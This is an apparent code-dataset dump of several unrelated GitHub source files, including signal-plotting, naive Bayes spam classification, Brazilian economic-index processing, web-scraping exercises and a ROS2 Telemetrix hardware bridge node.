plt.xlabel('Time (seconds)')\r\n plt.ylabel('Amplitude (volts)')\r\n plt.title('Carrier signal')\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 3)\r\n plt.plot(t, am_dsb_sc, plot_colors[0])\r\n plt.plot(t, u_band, plot_colors[1])\r\n plt.plot(t, l_band, plot_colors[2])\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.xlabel('Time (seconds)')\r\n plt.ylabel('Amplitude (volts)')\r\n plt.title('AM DSB-SC w/ side bands')\r\n\r\n # 3. Plot the two sided and single sided spectrum of AM DSB-SC signal\r\n subplot_rows, subplot_columns = 2, 1\r\n plt.figure(2)\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 1)\r\n plt.plot(f_range, fs_fft, plot_colors[0])\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.title('Two sided spectrum')\r\n plt.xlabel('Frequency (Hz)')\r\n plt.ylabel('Amplitude (Volts)')\r\n plt.xlim([0, end_frequency_range_limit])\r\n plt.xticks([i*1000 for i in range(-end_frequency_range_ticks,\r\n end_frequency_range_ticks)], rotation=45)\r\n\r\n fs_fft = make_single_side_spectrum(fs_fft)\r\n f_range = make_single_side_spectrum(f_range)\r\n\r\n plt.subplot(subplot_rows, subplot_columns, 2)\r\n plt.plot(f_range, fs_fft, plot_colors[0])\r\n plt.grid()\r\n plt.tight_layout()\r\n plt.title('Single sided spectrum')\r\n plt.xlabel('Frequency (Hz)')\r\n plt.ylabel('Amplitude (Volts)')\r\n plt.xlim([0, end_frequency_range_limit])\r\n plt.xticks([i*1000 for i in range(0, end_frequency_range_ticks)], rotation=45)\r\n\"\"\"\r\n\r\n# with plt.xkcd():\r\n#main(1, 1, 1000, 3, 10000)\r\ncas = [5, 10]\r\ncfs = [16000, 20000, 24000]\r\nias = [2, 4, 6, 8]\r\nifs = [i*1000 for i in [4, 8, 10, 12]]\r\ncounter = 0\r\nfor ca in cas:\r\n for cf in cfs:\r\n for ia in ias:\r\n for if_ in ifs:\r\n if main(counter, ia, if_, ca, cf) == 12.5:\r\n break\r\n counter += 1\r\n\r\n\r\n# plt.show()\r\n","repo_name":"mikezamayias/glowing-sniffle","sub_path":"Past Courses/Introduction to Telecommunications/lab/Task 4/script_0.py","file_name":"script_0.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5681765478","text":"import pickle\nfrom pathlib import Path\n\n\ndef pickle_save(obj, filename, protocol=5):\n # Check if 'filename' is a path-like or a file-like object\n if hasattr(filename, \"write\"):\n # If it is a file-like object, we dump the object to it\n pickle.dump(obj, filename, protocol=protocol)\n else:\n # If it is a path-like object, we dump the object to a file, creating the folder structure, if it does not exist\n filename = Path(filename)\n filename.parent.mkdir(exist_ok=True, parents=True)\n with open(filename, \"+wb\") as outfile:\n pickle.dump(obj, outfile, protocol=protocol)\n\n\ndef pickle_load(base_cls, filename):\n # Check if 'filename' is a path-like or a file-like object\n if hasattr(filename, \"read\"):\n # If it is a file-like object, we load the object from it\n restored_obj = pickle.load(filename)\n else:\n # If it is a path-like object, we load the object from a file\n with open(filename, \"+rb\") as infile:\n restored_obj = pickle.load(infile)\n assert type(restored_obj) == base_cls\n return restored_obj\n","repo_name":"CSML-IIT-UCL/kooplearn","sub_path":"kooplearn/_src/serialization.py","file_name":"serialization.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"17430015030","text":"def reverse(x):\r\n z = x[::-1]\r\n\r\n return z\r\n\r\ndef twist(x):\r\n z=[]\r\n j = reverse(x)\r\n\r\n for i in j:\r\n if type(i) == list:\r\n i = reverse(i)\r\n z.append(i)\r\n\r\n return z\r\n\r\nI = []\r\nprint(\"Instruction:\\n 1.Type \\\"1\\\" to add a top level element\\n 2.Type \\\"2\\\" to add a 2nd level element\\n 3.Type \\\"done\\\" to finish insertion\")\r\nwhile True:\r\n a = input()\r\n\r\n if a == \"1\":\r\n top = input(\"add one top level element:\")\r\n top = top.split(\" \")\r\n for i in top:\r\n I.append(i)\r\n print(I)\r\n\r\n elif a == \"2\":\r\n second = input(\"add one 2nd level element:\")\r\n second = second.split(\" \")\r\n I.append(second)\r\n print(I)\r\n\r\n elif a == \"done\":\r\n break\r\n\r\n else:\r\n print(\"please follow the instruction\")\r\n\r\n\r\nprint(\"reverse %s -->\" %I, reverse(I))\r\nprint(\"twist %s -->\" %I, twist(I))","repo_name":"Jiyoonki/Assignments","sub_path":"PrinciplesProgrammingLanguage/Exercise2.py","file_name":"Exercise2.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"362758581","text":"# _*_ coding = utf-8 _*_\n# @Date : 2021/12/27\n# @Time : 19:23\n# @NAME :molin\n'''\n 使用朴素贝叶斯对电子邮件进行分类的步骤:\n\n 收集数据:提供文本文件。\n 准备数据:将文本文件解析成词条向量。\n 分析数据:检查词条确保解析的正确性。\n 训练算法:使用我们之前建立的trainNB0()函数。\n 测试算法:使用classifyNB(),并构建一个新的测试函数来计算文档集的错误率。\n 使用算法:构建一个完整的程序对一组文档进行分类,将错分的文档输出到屏幕上。\n ————————————————\n 版权声明:本文为CSDN博主“Jack-Cui”的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。\n 原文链接:https://blog.csdn.net/c406495762/article/details/77500679\n'''\n\n# 准备数据\nimport re\nimport numpy as np\nimport random\n\n\"\"\"\n函数说明:接收一个大字符串并将其解析为字符串列表\n\nParameters:\n 无\nReturns:\n 无\nAuthor:\n Jack Cui\nBlog:\n http://blog.csdn.net/c406495762\nModify:\n 2017-08-14\n\"\"\"\ndef textParse(bigString):\n # * 会匹配0个或多个规则,split会将字符串分割成单个字符【python3.5+】; 这里使用\\W 或者\\W+ 都可以将字符数字串分割开,产生的空字符将会在后面的列表推导式中过滤掉\n listOfTokens = re.split(r'\\W+', bigString)\n # 将特殊符号作为切分标志进行字符串切分,即非字母、非数字\n return [tok.lower() for tok in listOfTokens if len(tok) > 2]\n\n# 函数说明:将切分的实验样本词条整理成不重复的词条列表,也就是词汇表\ndef createVocabList(dataSet):\n # 创建一个空的不重复列表\n vocabSet = set([])\n for document in dataSet:\n # 取并集\n vocabSet = vocabSet | set(document)\n return list(vocabSet)\n\n# 根据vocabList词汇表,将inputSet向量化,向量的每个元素为1或0\ndef setOfWords2Vec(vocabList, inputSet):\n returnVec = [0] * len(vocabList)\n for word in inputSet:\n if word in vocabList:\n returnVec[vocabList.index(word)] = 1\n else:\n print(\"the word: %s is not in my Vocabulary!\" % word)\n return returnVec\n\n# 函数说明:根据vocabList词汇表,构建词袋模型\ndef bagOfWord2Vec(vocabList, inputSet):\n returnVec = [0] * len(vocabList) # 创建一个其中所含元素都为0的向量\n for word in inputSet: # 遍历每个词条\n if word in vocabList: # 如果词条存在于词汇表中,则计数加一\n returnVec[vocabList.index(word)] += 1\n return returnVec\n\n# 函数说明:朴素贝叶斯分类器训练函数\n'''\nParameters:\n trainMatrix - 训练文档矩阵,即setOfWords2Vec返回的returnVec构成的矩阵\n trainCategory - 训练类别标签向量,即loadDataSet返回的classVec\nReturns:\n p0Vect - 侮辱类的条件概率数组\n p1Vect - 非侮辱类的条件概率数组\n pAbusive - 文档属于侮辱类的概率\n'''\ndef trainNB0(trainMatrix, trainCategory):\n # 计算训练的文档数目\n numTrainDocs = len(trainMatrix)\n # 计算每篇文档的词条数\n numWords = len(trainMatrix[0])\n # 文档属于侮辱类的概率\n pAbusive = sum(trainCategory)/float(numTrainDocs)\n # 创建numpy.ones数组,词条出现数初始化为1,拉普拉斯平滑\n p0Num = np.ones(numWords)\n p1Num = np.ones(numWords)\n # 分母初始化为2,拉普拉斯平滑\n p0Denom = 2.0\n p1Denom = 2.0\n\n for i in range(numTrainDocs):\n if trainCategory[i] == 1:\n # 统计属于侮辱类的条件概率所需的数据,即P(w0|1),P(w1|1),P(w2|1)···\n p1Num += trainMatrix[i]\n p1Denom += sum(trainMatrix[i])\n else:\n # 统计属于非侮辱类的条件概率所需的数据,即P(w0|0),P(w1|0),P(w2|0)···\n p0Num += trainMatrix[i]\n p0Denom += sum(trainMatrix[i])\n # 取对数,防止下溢出\n p1Vect = np.log(p1Num/p1Denom)\n p0Vect = np.log(p0Num/p0Denom)\n # 返回属于侮辱类的条件概率数组,属于非侮辱类的条件概率数组,文档属于侮辱类的概率\n return p0Vect, p1Vect, pAbusive\n\n\"\"\"\n函数说明:朴素贝叶斯分类器分类函数\n\nParameters:\n\tvec2Classify - 待分类的词条数组\n\tp0Vec - 非侮辱类的条件概率数组\n\tp1Vec -侮辱类的条件概率数组\n\tpClass1 - 文档属于侮辱类的概率\nReturns:\n\t0 - 属于非侮辱类\n\t1 - 属于侮辱类\n\"\"\"\ndef classifyNB(vec2Classify, p0Vec, p1Vec, pClass1):\n p1 = sum(vec2Classify * p1Vec) + np.log(pClass1) \t#对应元素相乘。logA * B = logA + logB,所以这里加上log(pClass1)\n p0 = sum(vec2Classify * p0Vec) + np.log(1.0 - pClass1)\n if p1 > p0:\n return 1\n else:\n return 0\n\n\n# 函数说明:测试朴素贝叶斯分类器\ndef spamTest():\n docList = []; classList = []; fullText = []\n # 遍历25个txt文件\n for i in range(1, 26):\n # 读取每个垃圾邮件,并字符串转换成字符串列表\n wordList = textParse(open('../dataset/spam/%d.txt' % i, 'r').read())\n docList.append(wordList)\n # 标记垃圾邮件,1表示垃圾文件\n classList.append(1)\n # 读取每个非垃圾邮件,并字符串转换成字符串列表\n wordList = textParse(open('D:\\learn\\python\\pythonSkill\\pythonBaseTrainning\\项目练手\\机器学习实战\\dataset\\ham\\%d.txt' % i, 'r').read())\n docList.append(wordList)\n # 标记非垃圾邮件,1表示垃圾文件\n classList.append(0)\n # 创建词汇表,不重复\n vocabList = createVocabList(docList)\n # print(vocabList)\n trainingSet = list(range(50))\n testSet = []\n # 从50个邮件中,随机挑选出40个作为训练集,10个做测试集\n for i in range(10):\n # 随机选取索索引值\n randIndex = int(random.uniform(0, len(trainingSet)))\n # 添加测试集的索引值\n testSet.append(trainingSet[randIndex])\n # 在训练集列表中删除添加到测试集的索引值\n del(trainingSet[randIndex])\n trainMat = []\n trainClasses = []\n # 创建训练集矩阵和训练集类别标签系向量\n for docIndex in trainingSet:\n # 将生成的词集模型添加到训练矩阵中\n trainMat.append(setOfWords2Vec(vocabList, docList[docIndex]))\n # 将类别添加到训练集类别标签系向量中\n trainClasses.append(classList[docIndex])\n # 训练朴素贝叶斯模型\n p0V, p1V, pSam = trainNB0(np.array(trainMat), np.array(trainClasses))\n # 错误分类计数\n errorCount = 0\n # 遍历测试集\n for docIndex in testSet:\n # 测试集的词集模型\n wordVector = setOfWords2Vec(vocabList, docList[docIndex])\n if classifyNB(np.array(wordVector), p0V, p1V, pSam) != classList[docIndex]:\n # 错误计数加1\n errorCount += 1\n print(\"分类错误的测试集:\",docList[docIndex])\n # 打印错误率\n print('错误率:%.2f%%' % (float(errorCount) / len(testSet) * 100))\n\nif __name__ == '__main__':\n spamTest()","repo_name":"yidaodashi/pythonSkills","sub_path":"pythonBaseTrainning/项目练手/机器学习实战/beiyes/beiyes_rubbish_email.py","file_name":"beiyes_rubbish_email.py","file_ext":"py","file_size_in_byte":7201,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27629445992","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Dec 7 08:41:16 2021\r\n\r\n@author: 2104998693\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport seaborn as sns; sns.set()\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimport matplotlib\r\nmatplotlib.rcParams['figure.figsize'] = (16,8)\r\n\r\ndef consulta_bc(codigo_bcb):\r\n url = 'http://api.bcb.gov.br/dados/serie/bcdata.sgs.{}/dados?formato=json'.format(codigo_bcb)\r\n df = pd.read_json(url)\r\n df['data'] = pd.to_datetime(df['data'], dayfirst=True)\r\n df.set_index('data', inplace=True)\r\n return df\r\n\r\nipca = consulta_bc(433)\r\n\r\nigpm = consulta_bc(189)\r\n\r\nselic = consulta_bc(4390)\r\n\r\nipca_acumulado = np.cumprod((ipca/100) + 1)\r\n\r\nigpm_acumulado = np.cumprod((igpm/100) + 1)\r\n\r\nselic_acumulado = np.cumprod((selic/100) + 1)\r\nselic_acumulado.reset_index(level=0, inplace=True)\r\n\r\n\r\nfech_atual = pd.read_excel(r'C:\\Users\\2104998693\\Desktop\\Modelagem\\Consolidado Modelagem 20_12_v1.xlsx')\r\n\r\nfech_atual['MES_DATA_DISPENSA'] = pd.to_datetime(fech_atual['MES_DATA_DISPENSA'])\r\nfech_atual['MES_DISTRIBUICAO'] = pd.to_datetime(fech_atual['MES_DISTRIBUICAO'])\r\n\r\nfech_ipca_disp = pd.merge(fech_atual, ipca_acumulado, left_on = \"MES_DATA_DISPENSA\", right_on = \"data\", how = 'left')\r\n\r\nfech_ipca_disp_dist = pd.merge(fech_ipca_disp, ipca_acumulado, left_on = \"MES_DISTRIBUICAO\", right_on = \"data\", how = 'left')\r\n\r\n\r\nfech_ipca_selic = pd.merge(fech_ipca_disp_dist, selic_acumulado, left_on = \"MES_DATA_DISPENSA\", right_on = \"data\", how = 'left')\r\n\r\ntest = selic_acumulado.loc[selic_acumulado.data == \"2021/09/01\", \"valor\"]\r\n\r\ntest = test.reset_index()\r\n\r\nfech_ipca_selic['Selic Setembro'] = test['valor'][0]\r\n\r\nfech_ipca_selic.rename(\r\n columns=({'valor_x':'IPCA Dispensa', 'valor_y': 'IPCA Distribuição', 'valor':'Selic Dispensa'}), \r\n inplace=True,)\r\n\r\nfech_ipca_selic['Taxa IPCA'] = fech_ipca_selic['IPCA Distribuição'] / fech_ipca_selic['IPCA Dispensa']\r\n\r\nfech_ipca_selic['Taxa Selic'] = fech_ipca_selic['Selic Setembro'] / fech_ipca_selic['Selic Dispensa']\r\n\r\nfech_ipca_selic.to_excel(r'C:\\Users\\2104998693\\Desktop\\Modelagem\\TesteSelicIPCA.xlsx', sheet_name='Consolidado', index = False)\r\n\r\n","repo_name":"dchunz/Python","sub_path":"Series temporais.py","file_name":"Series temporais.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31796866627","text":"from sklearn.model_selection import train_test_split\n\ntrain_x, test_x, train_y, test_y = train_test_split(X, # Our features\n y, # Our target\n stratify=y, # Make sure that there are equal amounts of our target in train and test data\n random_state=seed # train_test_split splits data randomly - by passing our seed, we can get reproducible results\n )\n\nclf.fit(train_x, train_y)\nscore = clf.score(test_x, test_y)\nprint(f\"Accuracy: {score:.2%}\")\n","repo_name":"andersbogsnes/sklearn_tutorial","sub_path":"snippets/train_test.py","file_name":"train_test.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"27135231060","text":"#War Metaphor Script\r\n#Kieffer Higgins\r\n# Make it more efficient later!\r\n#Imports\r\nimport os\r\nimport re\r\nfrom sys import argv\r\n#Let... argv[1] = BBC Climate Change List, argv[2] = War List, argv[3] = Intersection List\r\n#argv[4] = bbcIntersection #argv[5] = warintersection\r\n\r\n#///////////////////////////////////////////////////////////////////\r\n#functions for later use:\r\n#Saves a set that was made from a line of an article to file specified in argv[3]\r\ndef saveToIntersectionFile(line, fileName, outputFile, intersection ):\r\n #we had passed in a set but we can just save the line\r\n #lineString = ''.join(lineSet)\r\n intersectionString = ''.join(intersection)\r\n with open(outputFile, 'a', encoding = 'utf8') as file:\r\n try:\r\n file.write('Intersection: ' + intersectionString + '\\t Found in ' + fileName + \"\\t\" + line + '\\n')\r\n except:\r\n print(\"Could not save line \" + line + \"To Intersection File\")\r\n#Gets BBC List from file\r\ndef getBBCList():\r\n with open(argv[1], 'r') as file:\r\n bbcList = file.read().split(\"\\n\")\r\n return bbcList\r\n#Gets War List From File\r\ndef getWarList():\r\n with open(argv[2], 'r') as file:\r\n warList = file.read().split(\"\\n\")\r\n return warList\r\n#After searching for spaced words in our files we then change the spaced words in the bbc list to an underscore format\r\ndef fixBBCList():\r\n newList = []\r\n with open(argv[1], 'r') as file:\r\n bbcList = file.read().split(\"\\n\")\r\n for item in bbcList:\r\n if \" \" in item:\r\n\r\n newItem =item.replace(\" \", \"_\")\r\n\r\n newList.append(newItem)\r\n else:\r\n newList.append(item)\r\n #print(newList)\r\n return newList\r\n\r\n#/////////////////////////////////////////////////////////////////////////////\r\n\r\n# MAIN AREA\r\nprint(\"Starting Engines...\")\r\n#Let us get our BBC List and War List\r\nbbcList = getBBCList()\r\nwarList = getWarList()\r\n\r\n\r\n#Get all the files in genre folder (this script will be run in each folder)\r\nfiles = [file for file in os.listdir() if file.endswith(\".txt\")]\r\n\r\n# /////////////// REPLACE SPACES WITH UNDERSCORES //////////////////////////\r\n #!!!! There is an issue with this function where it still thinks it has to rename a new thing...but..it works for one run.\r\n#For each file in files\r\nfor file in files:\r\n #This is a flag used for later\r\n deleteFlag = 0\r\n #Try to do the following\r\n #try:\r\n #Open the file\r\n with open(file, 'r', encoding = 'utf8') as openedFile:\r\n #We read in the file\r\n readFile = openedFile.read()\r\n #If there's a word in the file that is also in the BBC list and it contains a space...\r\n #if (word in openedFile for word in bbcList) and \" \" in word:\r\n\r\n\r\n #For each word in the BBC List (not the War List as it does not have any words containing a space)\r\n for word in bbcList:\r\n #We check if that word is also in our read in file and if there is a space in the word\r\n #We could just check for the words with spaces in them...there might be a way more efficient way to do all of this\r\n if (word in readFile) and \" \" in word:\r\n #If the word is in the file and has a space in it,\r\n #We need to replace the space in that word in that file.\r\n\r\n oldWord = word\r\n newWord = oldWord.replace(\" \", \"_\")\r\n\r\n #Then we replace our old word with our new fixed up word\r\n newFileContent = readFile.replace(oldWord, newWord)\r\n\r\n\r\n #Let us create a new name for the files which we have replaced the spaces in\r\n newFileName = \"[SPACE REPLACED]\" + file\r\n #Now let's open a new file and write to it\r\n with open(newFileName, 'w', encoding = 'utf8') as theFileToWriteto:\r\n #We write the changed underscore / space content to file\r\n theFileToWriteto.write(newFileContent)\r\n #Now we must delete the old file\r\n #Let's change this flag so we can use it later\r\n deleteFlag = 1\r\n #If we have marked a file for deletion\r\n if deleteFlag == 1:\r\n #Close it and kill it.\r\n openedFile.close()\r\n os.remove(file)\r\n\r\n\r\n\r\n\r\n #If we can't do any of the above just move on and don't crash the program\r\n #except:\r\n #but make a note of it\r\n # print(\"Failed to open a file or replace something\")\r\n #continue\r\n#Replace the spaces in the words in our BBCLIST\r\nbbcList = fixBBCList()\r\n\r\n# ////////////////////////////////////////////////////////////\r\n\r\n# //////////////////// CHECKING FOR INTERSECTION ///////////////////\r\n#Make BBC list and War List into sets\r\nbbcSet = set(bbcList)\r\nwarSet = set(warList)\r\n#For each sentence in each genre\r\n\r\n# We need to reestablish our file list since it has changed\r\nfiles = [file for file in os.listdir() if file.endswith(\".txt\")]\r\n#For each file in our list of files\r\nfor file in files:\r\n #try:\r\n #We open each file in our list of files\r\n with open(file, 'r', encoding = 'utf8') as openedFile:\r\n #Assigning the read in contents to \"text file\"\r\n textFile = openedFile.read()\r\n #For each line (as determined by \\n char) in textFile,\r\n for line in textFile.split('\\n'):\r\n #Make the sentence / line a list\r\n lineList = line.split()\r\n #then make sentence / line a set\r\n lineSet = set(lineList)\r\n #We now perform checks as to whether or not there is an intersection of sets:\r\n\r\n #If a set of a line has an intersection with BBC SET:\r\n if (lineSet.intersection(bbcSet)):\r\n #Create a list of the intersecting values\r\n bbcIntersectionList = list(lineSet.intersection(bbcSet))\r\n #Save this line, filename and intersection to specified file (argv4)\r\n saveToIntersectionFile(line, file, argv[4], bbcIntersectionList)\r\n #If a set of a line has an intersection with WAR SET:\r\n if(lineSet.intersection(warSet)):\r\n #Create a list of the intersecting values\r\n warIntersectionList = list(lineSet.intersection(warSet))\r\n #Save this line, filename and intersection to specified file (argv5)\r\n saveToIntersectionFile(line,file, argv[5], warIntersectionList)\r\n\r\n\r\n #If intersections are had with both: (IMPORTANT PART)\r\n if (lineSet.intersection(bbcSet) and lineSet.intersection(warSet)):\r\n\r\n #Create a list of the intersecting words with bbcSet\r\n bbcListIntersection = list(lineSet.intersection(bbcSet))\r\n #Create a list of the intersecting worods with warSet\r\n warListIntersection = list(lineSet.intersection(warSet))\r\n #Create a new empty list\r\n intersection = []\r\n #Add the two lists to intersection:\r\n intersection.append(\"[\") #For ease of readability\r\n intersection.extend(bbcListIntersection)\r\n intersection.append(\"\\t\") #For ease of readability\r\n intersection.extend(warListIntersection)\r\n intersection.append(\"]\") #For ease of readability\r\n\r\n #Save this line, filename and intersection to specified file (argv3)\r\n saveToIntersectionFile(line, file, argv[3], intersection)\r\nprint(\"Morality Deconstructed\")\r\n\r\n #except:\r\n #print(\"Probably couldn't open a file or map a character\")\r\n #continue\r\n","repo_name":"kiefferjh/SimpleMetaphorDetectionScripts","sub_path":"metaphor.py","file_name":"metaphor.py","file_ext":"py","file_size_in_byte":7827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72390588968","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\n\n# if has Chinese, apply decode()\nhtml = urlopen(\"https://nba.hupu.com/wiki/%E7%A7%91%E6%AF%94-%E5%B8%83%E8%8E%B1%E6%81%A9%E7%89%B9\").read().decode('utf-8')\n#print(html)\n\nsoup=BeautifulSoup(html,features='lxml')\n# print('\\n----------------------------\\n',soup.h1)\n\n# print('\\n------------------\\n',soup.p)\n\n# print('\\n---------------------------\\n',soup.body)\n\n\nall_href=soup.find_all('a')\nprint('\\n----------------------------\\n',all_href)\nall_href=[l['href'] for l in all_href]\n#all_href = [l['href'] for l in all_href]\nprint('\\n11111111111111111111111111111111\\n',all_href)\n\n##自我练习\n\nall_link=soup.find_all('link')\nprint('\\n-==========\\n',all_link)\nall_link=[m['href'] for m in all_link]#用字典的形式href=‘*****’输出href的值\nprint('\\n0000000000000000000000000\\n',all_link)","repo_name":"Flintstone-xu/crawler","sub_path":"spider_practise_02_Beautiful.py","file_name":"spider_practise_02_Beautiful.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22982489765","text":"from datetime import datetime\nfrom typing import Tuple\n\nimport rclpy.node\nimport rclpy.service\nimport rclpy.time\nfrom builtin_interfaces.msg import Time as TimeMsg\nfrom std_msgs.msg import Header as HeaderMsg\n\nfrom oasis_drivers.ros.ros_translator import RosTranslator\nfrom oasis_drivers.telemetrix.telemetrix_bridge import TelemetrixBridge\nfrom oasis_drivers.telemetrix.telemetrix_callback import TelemetrixCallback\nfrom oasis_drivers.telemetrix.telemetrix_types import AnalogMode\nfrom oasis_drivers.telemetrix.telemetrix_types import DigitalMode\nfrom oasis_msgs.msg import AnalogReading as AnalogReadingMsg\nfrom oasis_msgs.msg import AVRConstants as AVRConstantsMsg\nfrom oasis_msgs.msg import CPUFanSpeed as CPUFanSpeedMsg\nfrom oasis_msgs.msg import DigitalReading as DigitalReadingMsg\nfrom oasis_msgs.msg import MCUMemory as MCUMemoryMsg\nfrom oasis_msgs.msg import MCUString as MCUStringMsg\nfrom oasis_msgs.srv import AnalogRead as AnalogReadSvc\nfrom oasis_msgs.srv import DigitalRead as DigitalReadSvc\nfrom oasis_msgs.srv import DigitalWrite as DigitalWriteSvc\nfrom oasis_msgs.srv import PWMWrite as PWMWriteSvc\nfrom oasis_msgs.srv import ReportMCUMemory as ReportMCUMemorySvc\nfrom oasis_msgs.srv import ServoWrite as ServoWriteSvc\nfrom oasis_msgs.srv import SetAnalogMode as SetAnalogModeSvc\nfrom oasis_msgs.srv import SetDigitalMode as SetDigitalModeSvc\nfrom oasis_msgs.srv import SetSamplingInterval as SetSamplingIntervalSvc\n\n\n################################################################################\n# ROS parameters\n################################################################################\n\n\nNODE_NAME = \"telemetrix_bridge\"\n\n# ROS parameters\nPARAM_COM_PORT = \"com_port\"\n\n# ROS topics\nANALOG_READING_TOPIC = \"analog_reading\"\nCPU_FAN_SPEED_TOPIC = \"cpu_fan_speed\"\nDIGITAL_READING_TOPIC = \"digital_reading\"\nMCU_MEMORY_TOPIC = \"mcu_memory\"\nMCU_STRING_TOPIC = \"mcu_string\"\n\n# ROS services\nANALOG_READ_SERVICE = \"analog_read\"\nCPU_FAN_WRITE_SERVICE = \"cpu_fan_write\"\nDIGITAL_READ_SERVICE = \"digital_read\"\nDIGITAL_WRITE_SERVICE = \"digital_write\"\nPWM_WRITE_SERVICE = \"pwm_write\"\nREPORT_MCU_MEMORY_SERVICE = \"report_mcu_memory\"\nSERVO_WRITE_SERVICE = \"servo_write\"\nSET_ANALOG_MODE_SERVICE = \"set_analog_mode\"\nSET_CPU_FAN_SAMPLING_INTERVAL_SERVICE = \"set_cpu_fan_sampling_interval\"\nSET_DIGITAL_MODE_SERVICE = \"set_digital_mode\"\nSET_SAMPLING_INTERVAL_SERVICE = \"set_sampling_interval\"\n\n\n################################################################################\n# Telemetrix parameters\n################################################################################\n\n\nDEFAULT_COM_PORT = \"/dev/ttyACM0\"\n\n\n################################################################################\n# ROS node\n################################################################################\n\n\nclass TelemetrixBridgeNode(rclpy.node.Node, TelemetrixCallback):\n def __init__(self) -> None:\n \"\"\"\n Initialize resources.\n \"\"\"\n # Initialize rclpy.node.NODE\n super().__init__(NODE_NAME)\n self.declare_parameter(PARAM_COM_PORT, DEFAULT_COM_PORT)\n\n # Initialize members\n com_port: str = str(self.get_parameter(PARAM_COM_PORT).value)\n self._bridge = TelemetrixBridge(self, com_port)\n\n # Reliable listener QOS profile for subscribers\n qos_profile: rclpy.qos.QoSPresetProfile = (\n rclpy.qos.QoSPresetProfiles.SYSTEM_DEFAULT.value\n )\n\n # Publishers\n self._analog_reading_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=AnalogReadingMsg,\n topic=ANALOG_READING_TOPIC,\n qos_profile=qos_profile,\n )\n self._cpu_fan_speed_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=CPUFanSpeedMsg,\n topic=CPU_FAN_SPEED_TOPIC,\n qos_profile=qos_profile,\n )\n self._digital_reading_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=DigitalReadingMsg,\n topic=DIGITAL_READING_TOPIC,\n qos_profile=qos_profile,\n )\n self._mcu_memory_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=MCUMemoryMsg,\n topic=MCU_MEMORY_TOPIC,\n qos_profile=qos_profile,\n )\n self._mcu_string_pub: rclpy.publisher.Publisher = self.create_publisher(\n msg_type=MCUStringMsg,\n topic=MCU_STRING_TOPIC,\n qos_profile=qos_profile,\n )\n\n # Once the publishers are set up, start the bridge\n self._bridge.initialize()\n\n # Once the bridge is started, advertise the services\n self._analog_read_service: rclpy.service.Service = self.create_service(\n srv_type=AnalogReadSvc,\n srv_name=ANALOG_READ_SERVICE,\n callback=self._handle_analog_read,\n )\n self._cpu_fan_write_service: rclpy.service.Service = self.create_service(\n srv_type=PWMWriteSvc,\n srv_name=CPU_FAN_WRITE_SERVICE,\n callback=self._handle_cpu_fan_write,\n )\n self._digital_read_service: rclpy.service.Service = self.create_service(\n srv_type=DigitalReadSvc,\n srv_name=DIGITAL_READ_SERVICE,\n callback=self._handle_digital_read,\n )\n self._digital_write_service: rclpy.service.Service = self.create_service(\n srv_type=DigitalWriteSvc,\n srv_name=DIGITAL_WRITE_SERVICE,\n callback=self._handle_digital_write,\n )\n self._pwm_write_service: rclpy.service.Service = self.create_service(\n srv_type=PWMWriteSvc,\n srv_name=PWM_WRITE_SERVICE,\n callback=self._handle_pwm_write,\n )\n self._report_mcu_memory_service: rclpy.service.Service = self.create_service(\n srv_type=ReportMCUMemorySvc,\n srv_name=REPORT_MCU_MEMORY_SERVICE,\n callback=self._handle_report_mcu_memory,\n )\n self._servo_write_service: rclpy.service.Service = self.create_service(\n srv_type=ServoWriteSvc,\n srv_name=SERVO_WRITE_SERVICE,\n callback=self._handle_servo_write,\n )\n self._set_analog_mode_service: rclpy.service.Service = self.create_service(\n srv_type=SetAnalogModeSvc,\n srv_name=SET_ANALOG_MODE_SERVICE,\n callback=self._handle_set_analog_mode,\n )\n self._set_cpu_fan_sampling_interval_service: rclpy.service.Service = (\n self.create_service(\n srv_type=SetSamplingIntervalSvc,\n srv_name=SET_CPU_FAN_SAMPLING_INTERVAL_SERVICE,\n callback=self._handle_set_cpu_fan_sampling_interval,\n )\n )\n self._set_digital_mode_service: rclpy.service.Service = self.create_service(\n srv_type=SetDigitalModeSvc,\n srv_name=SET_DIGITAL_MODE_SERVICE,\n callback=self._handle_set_digital_mode,\n )\n self._set_sampling_interval_service: rclpy.service.Service = (\n self.create_service(\n srv_type=SetSamplingIntervalSvc,\n srv_name=SET_SAMPLING_INTERVAL_SERVICE,\n callback=self._handle_set_sampling_interval,\n )\n )\n\n self.get_logger().info(\"Telemetrix bridge initialized\")\n\n def stop(self) -> None:\n \"\"\"Stop the bridge and cleanup ROS resources\"\"\"\n self._bridge.deinitialize()\n\n self.get_logger().info(\"Telemetrix bridge deinitialized\")\n\n # Destroy the node explicitly. Problems can occur when the garbage\n # collector automatically destroys the node object after ROS has\n # shut down.\n self.destroy_node()\n\n def on_analog_reading(\n self,\n timestamp: datetime,\n analog_pin: int,\n analog_value: float,\n reference_voltage: float,\n ) -> None:\n 